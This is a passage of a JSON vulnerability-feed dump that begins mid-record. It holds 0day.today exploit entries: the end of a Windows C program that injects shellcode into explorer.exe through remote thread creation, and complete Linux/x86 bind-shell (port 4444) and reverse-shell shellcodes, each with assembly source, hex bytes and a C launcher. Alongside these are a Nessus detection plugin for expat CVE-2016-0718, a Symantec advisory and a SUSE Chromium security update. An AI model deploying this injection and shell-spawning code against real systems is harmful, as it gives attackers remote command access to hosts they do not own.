%d\\n\",GetLastError());\r\n return -1;\r\n }\r\n \r\n \r\n do{\r\n if(0==strcmp(ps.szExeFile,\"explorer.exe\"))\r\n {\r\n process_found=1;\r\n break;\r\n }\r\n }while(Process32Next(s,&ps));\r\n \r\n \r\n if(!process_found)\r\n {\r\n printf(\"Unknown Process\\n\");\r\n return -1;\r\n }\r\n \r\n \r\n //opening process using pid \r\n \r\n \r\n proc=OpenProcess(PROCESS_ALL_ACCESS,0,ps.th32ProcessID);\r\n \r\n if(proc==INVALID_HANDLE_VALUE)\r\n {\r\n printf(\"OpenProcess() failed.Error code %d\\n\",GetLastError());\r\n return -1;\r\n } \r\n \r\n \r\n //allocating memory process memory\r\n \r\n if( (shell=VirtualAllocEx(proc,NULL,sizeof(shellcode),MEM_COMMIT,PAGE_EXECUTE_READWRITE)) == NULL)\r\n {\r\n printf(\"Failed to allocate memory into process\");\r\n CloseHandle(proc);\r\n return -1;\r\n }\r\n \r\n \r\n //writing shellcode into process memory\r\n \r\n WriteProcessMemory(proc,shell,shellcode,sizeof(shellcode),&total);\r\n \r\n if(sizeof(shellcode)!=total)\r\n {\r\n printf(\"Failed write shellcode into process memory\");\r\n CloseHandle(proc);\r\n return -1;\r\n }\r\n \r\n \r\n //Executing shellcode\r\n \r\n if((s=CreateRemoteThread(proc,NULL,0,(LPTHREAD_START_ROUTINE)shell,NULL,0,0))==NULL)\r\n {\r\n printf(\"Failed to Execute shellcode\");\r\n CloseHandle(proc);\r\n return -1;\r\n }\r\n \r\n CloseHandle(proc);\r\n CloseHandle(s);\r\n \r\n return 0;\r\n \r\n \r\n}\n\n# 0day.today [2018-10-30] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31462"}, {"lastseen": "2018-06-01T01:08:24", "bulletinFamily": "exploit", "description": "Exploit for linux/x86 platform in category shellcode", "modified": "2018-05-31T00:00:00", "published": "2018-05-31T00:00:00", "id": "1337DAY-ID-30511", "href": "https://0day.today/exploit/description/30511", "title": "Linux/x86 - Bind (4444/TCP) Shell Shellcode (105 bytes)", "type": "zdt", "sourceData": "/*\r\n; Filename: tcp_bind_shellcode_light.nasm\r\n; Author: Paolo Perego <[email\u00a0protected]>\r\n; Website: https://codiceinsicuro.it\r\n; Twitter: @thesp0nge\r\n; SLAE-ID: 1217\r\n; Purpose: binds on TCP port 4444 and spawn a shell on incoming\r\nconnections.\r\n \r\n \r\nglobal _start\r\n \r\nsection .text\r\n \r\n_start:\r\n; Creating the socket.\r\n;\r\n; int socket(int domain, int type, int protocol);\r\n;\r\n; socket() is defined as #define __NR_socket 359 on\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\n; AF_INET is defined as 2 in /usr/include/i386-linux-gnu/bits/socket.h\r\n; SOCK_STREAM is defined as 1 in\r\n/usr/include/i386-linux-gnu/bits/socket_type.h\r\nxor eax, eax\r\nmov ebx, eax\r\nmov ecx, eax\r\nmov edx, eax\r\n \r\nmov ax, 0x167 ; 359 in decimal\r\nmov bl, 0x2\r\nmov cl, 0x1\r\n \r\nint 0x80 ; sfd = socket(AF_INET, SOCK_STREAM, 0);\r\nmov ebx, eax ; storing the socket descriptor into EBX for next syscall\r\n \r\n;push eax ; save socket descriptor into the stack\r\n \r\n; Binding the socket to 0.0.0.0 address at port 4444\r\n;\r\n; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);\r\n;\r\n;\r\n; bind() is defined as #define __NR_bind 361 on\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\n \r\nxor eax, eax\r\nmov ax, 0x169 ; 361 in decimal\r\nxor ecx, ecx\r\npush ecx ; pushing 32 bit INADDR_ANY\r\npush word 0x5c11 ; pushing PORT 4444 in network byte order\r\npush word 0x2 ; pushing AF_INET as sin_family\r\n \r\nmov ecx, esp ; now ECX points to the my_addr data structure\r\nmov dl, 0x10 ; sizeof(my_addr) = 16 bytes\r\nint 0x80 ; bind(sfd, (struct sockaddr *) &my_addr, sizeof(my_addr));\r\n \r\n; Listening on opened socket bound to port 4444\r\n;\r\n; int listen(int sockfd, int backlog);\r\n;\r\n; listen() is defined as #define __NR_listen 363 in\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\nxor ecx, ecx\r\nxor eax, eax\r\nmov ax, 0x16b ; 363 in decimal\r\nint 0x80 ; listen(sfd, 0);\r\n \r\n; Accepting incoming connection on listening socket\r\n;\r\n; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);\r\n;\r\n; accept() is not defined as syscall in\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h.\r\n; Instead accept4() is defined as #define __NR_accept4 364.\r\n;\r\n; From the man page, accept4() has the followint prototype:\r\n; int accept4(int sockfd, struct sockaddr *addr, socklen_t *addrlen, int\r\nflags);\r\n;\r\n; The last integer, as from the man page, if set to 0 makes the\r\n; accept4() call to behave as the same as the accept()\r\nxor eax, eax\r\nmov ax, 0x16c ; 364 in decimal\r\n \r\npush ecx ; ECX is 0, pushing on the stack\r\n \r\nmov esi, ecx\r\nmov ecx, esp ; ECX now points to a zero bytes region from the stack.\r\nmov edx, esp\r\n \r\nint 0x80 ; cfd = accept4(sfd, NULL, NULL, 0);\r\n \r\nmov ebx, eax ; Saving socket descript resulting from accept4 into EBX\r\n \r\n; Duplicating descriptor 0, 1, 2 to the socket opened by client\r\n;\r\n; int dup2(int oldfd, int newfd);\r\n;\r\n; dup2 is defined as #define __NR_dup2 63 in\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\n \r\nxor ecx, ecx\r\nmov cl, 2\r\nxor eax, eax\r\n \r\ndup2:\r\nmov al, 0x3F ; 63 in decimal\r\nint 0x80 ; duplicating file descriptors in backwards order; from 2 to 0\r\ndec ecx\r\njns dup2\r\n \r\n; Executing shell\r\n;\r\n; int execve(const char *filename, char *const argv[], char *const envp[]);\r\n; execve() is defined as #define __NR_execve 11 on\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\n \r\nxor eax, eax\r\npush eax ; The NULL byte\r\npush 0x68732f2f ; \"sh//\". The second '\\' is used to align our command into\r\nthe stack\r\npush 0x6e69622f ; \"nib/\"\r\nmov ebx, esp ; EBX now points to \"/bin//sh\"\r\nxor ecx, ecx\r\nxor edx, edx\r\nmov al, 0xB ; 11 in decimal\r\nint 0x80\r\n \r\n */\r\n#include<stdio.h>\r\n#include<string.h>\r\n \r\nunsigned char code[] = \\\r\n \r\n \"\\x31\\xc0\\x89\\xc3\\x89\\xc1\\x89\\xc2\\x66\\xb8\\x67\\x01\\xb3\\x02\\xb1\\x01\\xcd\\x80\\x89\\xc3\\x31\\xc0\\x66\\xb8\\x69\\x01\\x31\\xc9\\x51\\x66\\x68\\x15\\xb3\\x66\\x6a\\x02\\x89\\xe1\\xb2\\x10\\xcd\\x80\\x31\\xc9\\x31\\xc0\\x66\\xb8\\x6b\\x01\\xcd\\x80\\x31\\xc0\\x66\\xb8\\x6c\\x01\\x51\\x89\\xce\\x89\\xe1\\x89\\xe2\\xcd\\x80\\x89\\xc3\\x31\\xc9\\xb1\\x02\\x31\\xc0\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xb0\\x0b\\xcd\\x80\";\r\n \r\n \r\n \r\nint main(int argc, char **argv)\r\n{\r\nprintf(\"Shellcode Length: %d\\n\", strlen(code));\r\nint (*ret)() = (int(*)())code;\r\nret();\r\n}\r\n \r\n \r\n \r\n-- \r\n$ cd /pub\r\n$ more beer\r\n \r\nI pirati della sicurezza applicativa: https://codiceinsicuro.it\n\n# 0day.today [2018-06-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30511"}, {"lastseen": "2018-05-15T02:35:38", "bulletinFamily": "exploit", "description": "Exploit for linux/x86 platform in category shellcode", "modified": "2018-05-14T00:00:00", "published": "2018-05-14T00:00:00", "id": "1337DAY-ID-30347", "href": "https://0day.today/exploit/description/30347", "title": "Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) #Shell #Shellcode (96 Bytes)", "type": "zdt", "sourceData": "/*\r\n; Title: Linux/x86 - TCP reverse shell\r\n; Author: Paolo Perego <[email\u00a0protected]>\r\n; Website: https://codiceinsicuro.it\r\n; Blog post:\r\nhttps://codiceinsicuro.it/slae/assignment-2-create-a-reverse-shellcode/\r\n; Twitter: @thesp0nge\r\n; SLAE-ID: 1217\r\n; Purpose: connect to a given IP and PORT and spawning a reverse shell if\r\n; connection succeded\r\n \r\n \r\nglobal _start\r\n \r\nsection .text\r\n \r\n_start:\r\n \r\n; Creating the socket.\r\n;\r\n; int socket(int domain, int type, int protocol);\r\n;\r\n; socket() is defined as #define __NR_socket 359 on\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\n; AF_INET is defined as 2 in /usr/include/i386-linux-gnu/bits/socket.h\r\n; SOCK_STREAM is defined as 1 in\r\n/usr/include/i386-linux-gnu/bits/socket_type.h\r\nxor eax, eax\r\nxor ebx, ebx\r\nxor ecx, ecx\r\nxor edx, edx\r\n \r\nmov ax, 0x167\r\nmov bl, 0x2\r\nmov cl, 0x1\r\nint 0x80 ; sfd = socket(AF_INET, SOCK_STREAM, 0);\r\nmov ebx, eax ; storing the socket descriptor into EBX for next syscall\r\n \r\n; Connect to my peer\r\n;\r\n; connect() is defined as #define __NR_connect 362 on\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\n; peer.sin_family = AF_INET;\r\n; peer.sin_port = htons(DPORT);\r\n; peer.sin_addr.s_addr = inet_addr(IP);\r\n; ret = connect(sfd, (const struct sockaddr *)&peer, sizeof(struct\r\nsockaddr_in));\r\n \r\n; 127 = 0x7f\r\n; 0 = 0x0\r\n; 0 = 0x0\r\n; 1 = 0x1\r\n \r\n; push 0x0100007f\r\nmov eax, 0xfeffff80\r\nxor eax, 0xffffffff\r\npush eax\r\npush word 0x5c11 ; port 4444 is 0x5c11\r\npush word 0x2 ; AF_INET is 2\r\n \r\nmov ecx, esp\r\nmov dl, 0x10 ; sizeof(struct sockaddr_in)\r\nxor eax, eax\r\nmov ax, 0x16a\r\nint 0x80\r\n \r\ntest eax, eax ; check if eax is zero\r\njnz exit_on_error\r\n \r\n; Duplicating descriptor 0, 1, 2 to the socket opened by client\r\n;\r\n; int dup2(int oldfd, int newfd);\r\n;\r\n; dup2 is defined as #define __NR_dup2 63 in\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\n \r\nxor ecx, ecx\r\nmov cl, 2\r\nxor eax, eax\r\n \r\ndup2:\r\nmov al, 0x3F ; 63 in decimal\r\nint 0x80 ; duplicating file descriptors in backwards order; from 2 to 0\r\ndec ecx\r\njns dup2\r\n \r\n; Executing shell\r\n;\r\n; int execve(const char *filename, char *const argv[], char *const envp[]);\r\n; execve() is defined as #define __NR_execve 11 on\r\n/usr/include/i386-linux-gnu/asm/unistd_32.h\r\n \r\nxor eax, eax\r\npush eax ; The NULL byte\r\npush 0x68732f2f ; \"sh//\". The second '\\' is used to align our command into\r\nthe stack\r\npush 0x6e69622f ; \"nib/\"\r\nmov ebx, esp ; EBX now points to \"/bin//sh\"\r\nxor ecx, ecx\r\nxor edx, edx\r\nmov al, 0xB ; 11 in decimal\r\nint 0x80\r\n \r\nexit_on_error:\r\nmov bl, 0x1\r\nxor eax, eax ; zero-ing EAX\r\nmov al, 0x1\r\nint 0x80\r\n*/\r\n#include<stdio.h>\r\n#include<string.h>\r\n \r\nunsigned char code[] = \\\r\n\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x31\\xd2\\x66\\xb8\\x67\\x01\\xb3\\x02\\xb1\\x01\\xcd\\x80\\x89\\xc3\\xb8\\x80\\xff\\xff\\xfe\\x83\\xf0\\xff\\x50\\x66\\x68\\x11\\x5c\\x66\\x6a\\x02\\x89\\xe1\\xb2\\x10\\x31\\xc0\\x66\\xb8\\x6a\\x01\\xcd\\x80\\x85\\xc0\\x75\\x24\\x31\\xc9\\xb1\\x02\\x31\\xc0\\xb0\\x3f\\xcd\\x80\\x49\\x79\\xf9\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x31\\xc9\\x31\\xd2\\xb0\\x0b\\xcd\\x80\\xb3\\x01\\x31\\xc0\\xb0\\x01\\xcd\\x80\";\r\n \r\n \r\nint main(int argc, char **argv)\r\n{\r\nprintf(\"Shellcode Length: %d\\n\", strlen(code));\r\nint (*ret)() = (int(*)())code;\r\nret();\r\n}\n\n# 0day.today [2018-05-15] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30347"}], "nessus": [{"lastseen": "2019-11-01T02:06:28", "bulletinFamily": "scanner", "description": "According to the version of the expat packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerability :\n\n - An out-of-bounds read flaw was found in the way Expat\n processed certain input. A remote attacker could send\n specially crafted XML that, when parsed by an\n application using the Expat library, would cause that\n application to crash or, possibly, execute arbitrary\n code with the permission of the user running the\n application.(CVE-2016-0718)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2019-1446.NASL", "href": "https://www.tenable.com/plugins/nessus/124949", "published": "2019-05-14T00:00:00", "title": "EulerOS Virtualization 3.0.1.0 : expat (EulerOS-SA-2019-1446)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124949);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/06/27 13:33:25\");\n\n script_cve_id(\n \"CVE-2016-0718\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : expat (EulerOS-SA-2019-1446)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the expat packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerability :\n\n - An out-of-bounds read flaw was found in the way Expat\n processed certain input. A remote attacker could send\n specially crafted XML that, when parsed by an\n application using the Expat library, would cause that\n application to crash or, possibly, execute arbitrary\n code with the permission of the user running the\n application.(CVE-2016-0718)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1446\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c2493683\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected expat package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:expat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:expat-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:expat-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"expat-2.1.0-10.h1\",\n \"expat-devel-2.1.0-10.h1\",\n \"expat-static-2.1.0-10.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"expat\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "symantec": [{"lastseen": "2018-11-14T02:16:08", "bulletinFamily": "software", "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to execute arbitrary code with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1709 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for ARM64-based Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 Version 1809 for 32-bit Systems \n * Microsoft Windows 10 Version 1809 for ARM64-based Systems \n * Microsoft Windows 10 Version 1809 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 1709 \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n * Microsoft Windows Server 2019 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2018-11-13T00:00:00", "published": "2018-11-13T00:00:00", "id": "SMNTC-105805", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/105805", "title": "Microsoft Windows COM CVE-2018-8550 Local Privilege Escalation Vulnerability", "type": "symantec", "cvss": {"score": 0.0, "vector": "NONE"}}], "suse": [{"lastseen": "2018-09-08T13:50:15", "bulletinFamily": "unix", "description": "This update for Chromium to version 69.0.3497.81 fixes multiple issues.\n\n Security issues fixed (boo#1107235):\n\n - CVE-2018-16065: Out of bounds write in V8\n - CVE-2018-16066:Out of bounds read in Blink\n - CVE-2018-16067: Out of bounds read in WebAudio\n - CVE-2018-16068: Out of bounds write in Mojo\n - CVE-2018-16069:Out of bounds read in SwiftShader\n - CVE-2018-16070: Integer overflow in Skia\n - CVE-2018-16071: Use after free in WebRTC\n - CVE-2018-16073: Site Isolation bypass after tab restore\n - CVE-2018-16074: Site Isolation bypass using Blob URLS\n - Out of bounds read in Little-CMS\n - CVE-2018-16075: Local file access in Blink\n - CVE-2018-16076: Out of bounds read in PDFium\n - CVE-2018-16077: Content security policy bypass in Blink\n - CVE-2018-16078: Credit card information leak in Autofill\n - CVE-2018-16079: URL spoof in permission dialogs\n - CVE-2018-16080: URL spoof in full screen mode\n - CVE-2018-16081: Local file access in DevTools\n - CVE-2018-16082: Stack buffer overflow in SwiftShader\n - CVE-2018-16083: Out of bounds read in WebRTC\n - CVE-2018-16084: User confirmation bypass in external protocol handling\n - CVE-2018-16085: Use after free in Memory Instrumentation\n - CVE-2017-15430: Unsafe navigation in Chromecast (boo#1106341)\n - CVE-2018-16086: Script injection in New Tab Page\n - CVE-2018-16087: Multiple download restriction bypass\n - CVE-2018-16088: User gesture requirement bypass\n\n The re2 regular expression library was updated to the current version\n 2018-09-01.\n\n", "modified": "2018-09-08T12:13:32", "published": "2018-09-08T12:13:32", "id": "OPENSUSE-SU-2018:2664-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-09/msg00017.html", "title": "Security update for chromium (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}]}
